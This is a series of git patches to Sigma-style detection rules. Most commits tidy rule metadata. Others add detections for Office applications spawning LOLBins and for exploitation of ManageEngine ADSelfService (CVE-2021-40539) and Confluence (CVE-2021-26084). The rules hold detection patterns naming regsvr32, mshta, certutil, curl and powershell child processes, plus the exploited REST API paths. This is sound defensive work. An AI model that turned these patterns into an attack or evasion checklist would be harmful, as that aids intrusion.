b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,4 +1,5 @@ title: File Creation by Office Applications +id: f1d7f7d6-11e5-11ec-82a8-0242ac130003 description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: file_event From 7c9be6da32ecb4e1cf276ad3259595cf3f9154c0 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:24:05 -0600 Subject: [PATCH 0832/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...itor_LOLBins_Process_Creations_by_Office_applications.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 896585ff..70e69792 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,5 @@ title: LOLBins Process Created With Office Application +id: 7ce4d5ba-11e6-11ec-82a8-0242ac130003 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation From b0ad49d950b6c46c1ddace9384b1699e65c57b5b Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:27:16 -0600 Subject: [PATCH 0833/1367] changed id to v4 uuid 23daeb52-e6eb-493c-8607-c4f0246cb7d8 --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index acc32c73..49245266 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,5 +1,5 @@ title: Created Executables and Files by Office Applications -id: c64ee10c-11e4-11ec-82a8-0242ac130003 +id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From 2bc38a0ed4ee675ff4c2282cfae6cd3429e2ae0b Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:27:48 -0600 Subject: [PATCH 0834/1367] changed id uuid to v4 8a582fe2-0882-4b89-a82a-da6b2dc32937 --- ...r_LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 13fdecd3..9dab9d43 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,5 +1,5 @@ title: Lolbins Process Creation with WmiPrvse -id: 0d61a48a-11e5-11ec-82a8-0242ac130003 +id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From a334ea167cb9cc1d9b9f4d68ded349ade1c41f79 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:28:17 -0600 Subject: [PATCH 0835/1367] changed id uuid to v4 c0e1c3d5-4381-4f18-8145-2583f06a1fe5 --- ...e_Application_from_proxy executing_regsvr32_with_payload.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml index 8e7f40b4..eabcf9c8 100644 --- a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml @@ -1,5 +1,5 @@ title: Excel Proxy Executing Regsvr32 With Payload -id: 5c2290fc-11e5-11ec-82a8-0242ac130003 +id: c0e1c3d5-4381-4f18-8145-2583f06a1fe5 description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From d65881b7525afcac4e19548a0521c13b5eb51724 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:28:58 -0600 Subject: [PATCH 0836/1367] changed id uuid to v4 04f5363a-6bca-42ff-be70-0d28bf629ead --- .../Monitor_Office_Applications_Spawning_WMI_command-line.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 9172188b..3963f86e 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -1,5 +1,5 @@ title: Office Applications Spawning Wmi Cli -id: 91d104c2-11e5-11ec-82a8-0242ac130003 +id: 04f5363a-6bca-42ff-be70-0d28bf629ead description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From 8b9cf80be250150679a8c024dd97638a53af3ecf Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:29:31 -0600 Subject: [PATCH 0837/1367] changed id uuid to v4 3ee1bba8-b9e2-4e35-bec5-7fb66b6b3815 --- ..._Process Create_command_execution_by_Office_Applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml index 9ef408ef..079c49ac 100644 --- a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml +++ b/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml @@ -1,5 +1,5 @@ title: WMI Command Execution by Office Applications -id: caec93f2-11e5-11ec-82a8-0242ac130003 +id: 3ee1bba8-b9e2-4e35-bec5-7fb66b6b3815 description: Initial execution of malicious document calls wmic Win32_Process::Create to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From 9a42b690bdee072acb7a31472a3800288c8fd5c3 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:30:02 -0600 Subject: [PATCH 0838/1367] changed id uuid to v4 8c6fd6fc-28fc-4597-a86a-fc1de20b039d --- ...es_creation_by_Office_applications_using_file_extentions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 5775a21e..28f02620 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,5 +1,5 @@ title: File Creation by Office Applications -id: f1d7f7d6-11e5-11ec-82a8-0242ac130003 +id: 8c6fd6fc-28fc-4597-a86a-fc1de20b039d description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From a6a3f6b3924f0035365db54a9aa02c1256f5be5b Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 10 Sep 2021 10:31:11 +0700 Subject: [PATCH 0839/1367] Create web_cve_2021_40539_manageengine_adselfservice_exploit.yml --- ...539_manageengine_adselfservice_exploit.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml diff --git a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml new file mode 100644 index 00000000..1f049dbf --- /dev/null +++ b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml @@ -0,0 +1,27 @@ +title: CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit +id: fcbb4a77-f368-4945-b046-4499a1da69d1 +status: experimental +description: Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539). +references: + - https://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/ + - https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html +author: Sittikorn S, Nuttakorn L +date: 2021/09/10 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver + definition: 'Must be collect log from \ManageEngine\ADSelfService Plus\logs' +detection: + selection: + c-uri|contains: + - '/RestAPI/LogonCustomization' + - '/RestAPI/Connection' + condition: selection +fields: + - c-ip + - c-uri +falsepositives: + - External Pentesting +level: critical From 6a7ac098edff8e996e7227bd5496ae0b77b4adc5 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:31:20 -0600 Subject: [PATCH 0840/1367] changed id uuid to v4 b45e1519-5de5-4dfe-bef6-73bc48c2b983 --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 70e69792..d6039599 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,5 +1,5 @@ title: LOLBins Process Created With Office Application -id: 7ce4d5ba-11e6-11ec-82a8-0242ac130003 +id: b45e1519-5de5-4dfe-bef6-73bc48c2b983 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ From f7b8fd571d03b8c29edb96146b161163a2c56326 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:31:57 -0600 Subject: [PATCH 0841/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index abcb3bae..69368182 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,5 +1,5 @@ title: LOLBins Process Created With WmiPrvSE -id: f90d4ff4-db81-4576-9719-8ed45fe387c8 +id: 59447a89-5ba1-44ac-9d48-1c620a53cd0b description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -10,7 +10,7 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental date: 2021/08/23 logsource: From ba995ef442fd7bc76a6e0324747e42303810d9fa Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:32:42 -0600 Subject: [PATCH 0842/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...plications_from_proxy_executing_regsvr32_with_payload.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml index 0dbd9903..25eca696 100644 --- a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml @@ -1,4 +1,5 @@ title: Excel Proxy Executing Regsvr32 With Payload +id: 9d1c72f5-43f0-4da5-9320-648cf2099dd0 description: Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).But we have command-line in the event which allow us to "restore" this suspicous parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: process_creation From d14c26f5f19cedea457cbcdabc9bb1ff4800885b Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:33:36 -0600 Subject: [PATCH 0843/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custome id --- ...creation_by_Office_applications_using_file_extentions.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 55229ae7..01a3bfa4 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,4 +1,5 @@ title: Created Executables and Files by Office Applications +id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4 description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: Windows category: file_event From ca19f43a06493c648fd477199e6ce002f06934a4 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:35:21 -0600 Subject: [PATCH 0844/1367] Resolved more issues from last commit as per comments Added the following fixes to text inside the rule: date attack.defense_evasion added custom id --- .../sysmon/Office_Applications_Spawning_WMI_command-line.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml index 8fea8200..9a2cecf1 100644 --- a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml @@ -1,4 +1,5 @@ title: Office Applications Spawning Wmi Cli +id: 518643ba-7d9c-4fa5-9f37-baed36059f6a description: Initial execution of malicious document calls wmic to execute the file with regsvr32 references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ @@ -9,9 +10,9 @@ tags: - attack.t1047 - attack.t1218.010 - attack.execution - - attack.defence_evasion + - attack.defense_evasion status: experimental -Date: 2021/08/23 +date: 2021/08/23 logsource: product: windows category: process_creation From 6cae20b9b8124b9cce663f0fcce2af3d74ce328d Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:38:42 -0600 Subject: [PATCH 0845/1367] Changed title changed title --- ...es_creation_by_Office_applications_using_file_extentions.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 01a3bfa4..1c4366eb 100644 --- a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -1,4 +1,4 @@ -title: Created Executables and Files by Office Applications +title: Created Files by Office Applications id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4 description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: From 5547d274a0202aa27ad570b4471f68abb32894cc Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:41:56 -0600 Subject: [PATCH 0846/1367] Changed Title title: New LOLBin Process by Office Applications --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 49245266..1a2a1ef6 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,4 @@ -title: Created Executables and Files by Office Applications +title: New LOLBin Process by Office Applications id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: From 44e39ec3ac3a6540fe174e313270a72fd425db9f Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:43:35 -0600 Subject: [PATCH 0847/1367] Changed title changed title to stay within rule guideline --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 1a2a1ef6..32f406ae 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,4 @@ -title: New LOLBin Process by Office Applications +title: New Lolbin Process by Office Applications id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: From a3a12375b51fdad40fe38a61c4feb5ccf4bebf7b Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:51:22 -0600 Subject: [PATCH 0848/1367] changed title title: Lolbins Process Created With Office Application --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index d6039599..cbeb23f7 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,4 @@ -title: LOLBins Process Created With Office Application +title: Lolbins Process Created With Office Application id: b45e1519-5de5-4dfe-bef6-73bc48c2b983 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: From 361121c4027426b453637a3baa6e174e4c07d274 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:51:49 -0600 Subject: [PATCH 0849/1367] changed title title: Lolbins Process Created With WmiPrvSE --- ...r_LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 69368182..d456c86b 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,4 +1,4 @@ -title: LOLBins Process Created With WmiPrvSE +title: Lolbins Process Created With WmiPrvSE id: 59447a89-5ba1-44ac-9d48-1c620a53cd0b description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: From 91081a7fbc6df9cbdbadb5973040e23c0cd1a751 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Fri, 10 Sep 2021 10:04:16 +0545 Subject: [PATCH 0850/1367] Added rule for Atlassian Confluence CVE-2021-26084 --- ...sian_confluence_cve_2021_26084_exploit.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml diff --git a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml new file mode 100644 index 00000000..4099a09d --- /dev/null +++ b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml @@ -0,0 +1,34 @@ +title: Atlassian Confluence CVE-2021-26084 +id: 245f92e3-c4da-45f1-9070-bc552e06db11 +status: experimental +description: Detects spawing of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 +tags: + - attack.initial_access + - attack.execution + - attack.t1190 + - attack.t1059 +author: Bhabesh Raj +date: 2021/09/08 +references: + - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html + - https://github.com/h3v0x/CVE-2021-26084_Confluence +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + # Monitor suspicious child processes spawned by Confluence + ParentImage|endswith: '\Atlassian\Confluence\jre\bin\java.exe' + CommandLine|contains: + - 'cmd /c' + - 'cmd /k' + - 'powershell' + - 'certutil' + - 'curl' + - 'whoami' + - 'ipconfig' + condition: selection \ No newline at end of file From 0806e4ccd28271f628e5579965be1ec6dffbf5ff Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 10 Sep 2021 11:30:51 +0700 Subject: [PATCH 0851/1367] Update web_cve_2021_40539_manageengine_adselfservice_exploit.yml --- .../web_cve_2021_40539_manageengine_adselfservice_exploit.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml index 1f049dbf..a0ff44c9 100644 --- a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml +++ b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml @@ -11,6 +11,7 @@ tags: - attack.initial_access - attack.t1190 logsource: + product: zoho_manageengine category: webserver definition: 'Must be collect log from \ManageEngine\ADSelfService Plus\logs' detection: From 4af244b1354328033f507c821675ac8357e76801 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 23:08:52 -0600 Subject: [PATCH 0852/1367] Duplicate Rule Removed rule as it was duplicated --- ...creations_with_Wmiprvse_parent_process.yml | 33 ------------------- 1 file changed, 33 deletions(-) delete mode 100644 rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml deleted file mode 100644 index d456c86b..00000000 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ /dev/null @@ -1,33 +0,0 @@ -title: Lolbins Process Created With WmiPrvSE -id: 59447a89-5ba1-44ac-9d48-1c620a53cd0b -description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defense_evasion -status: experimental -date: 2021/08/23 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - Image|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection2: - ParentImage|endswith: \wbem\WmiPrvSE.exe - condition: selection1 and selection2 -falsepositives: - - FPs are possible here, but some LOLBins weren't excluded for obvious reasons. -level: high From f4155010ff1f18114bed95a6fb3b942e5acc52bd Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 23:09:20 -0600 Subject: [PATCH 0853/1367] Duplicate Rule Removed rule as it was duplicated --- ...ocess_Creations_by_Office_applications.yml | 36 ------------------- 1 file changed, 36 deletions(-) delete mode 100644 rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml deleted file mode 100644 index cbeb23f7..00000000 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ /dev/null @@ -1,36 +0,0 @@ -title: Lolbins Process Created With Office Application -id: b45e1519-5de5-4dfe-bef6-73bc48c2b983 -description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defense_evasion -status: experimental -date: 2021/08/23 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - Image|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection2: - ParentImage|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 -falsepositives: - - Unknown -level: high From 0b5e8cb980e7f99fac0814c9920905d6a2e66b0e Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Fri, 10 Sep 2021 07:52:35 +0200 Subject: [PATCH 0854/1367] Update lnx_auditd_hidden_zip_files_steganography.yml Formatting changes --- .../auditd/lnx_auditd_hidden_zip_files_steganography.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git 